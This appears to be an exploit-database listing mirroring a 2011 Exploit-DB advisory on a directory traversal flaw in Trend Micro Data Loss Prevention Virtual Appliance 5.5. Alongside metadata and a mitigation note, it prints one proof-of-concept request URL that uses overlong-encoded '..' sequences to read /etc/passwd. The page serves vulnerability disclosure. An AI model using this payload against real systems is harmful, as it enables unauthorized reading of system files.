header-logo
Suggest Exploit
vendor:
Data Loss Prevention Virtual Appliance
by:
Luis Martinez, Sergio Lopez,White Hat Consultores
N/A
CVSS
N/A
Directory Traversal
22
CWE
Product Name: Data Loss Prevention Virtual Appliance
Affected Version From: 5.5
Affected Version To: 5.5
Patch Exists: Yes
Related CWE: N/A
CPE: a:trend_micro:data_loss_prevention_virtual_appliance:5.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2011

Directory Traversal Vulnerability in Trend Micro Data Loss Prevention Virtual Appliance 5.5

A directory traversal vulnerability, can be exploited to read files outside of the web root. The vulnerability is present in Trend Micro Data Loss Prevention Virtual Appliance 5.5. An attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable server. This will allow the attacker to read files outside of the web root.

Mitigation:

Upgrade to the latest version of Trend Micro Data Loss Prevention Virtual Appliance 5.5.
Source

Exploit-DB raw data:

Software: Trend Micro Data Loss Prevention Virtual Appliance 5.5
Vulnerability: Directory Traversal
Threat Level: Serious (5/5)
Download: http://support.trendmicro.com.cn/TM- Product/Product/DLP/5.5/Manager/5.5_GM/DLPVA- 5.5.1294-i386-DVD.iso
Discovery Date: 27/05/2011
Remote: Yes

Author Site Email: Luis Martinez, Sergio Lopez,White Hat Consultores 
http://whitehatconsultores.com/ Sergio López <sergio.sh at gmail.com> Luis Martínez <luismtzsilva at gmail.com>

Description:
A directory traversal vulnerability, can be exploited to read files outside of the web root.

PoC Exploit:
https://IP:8443/dsc//%c0%ae%c0%ae/%c0%ae%c0%ae/%c 0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%a e%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c 0%ae/%c0%ae%c0%ae/etc/passwd

PDF Advisory: 
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17388.pdf

Navigation

Suggest Exploit

Services By CQR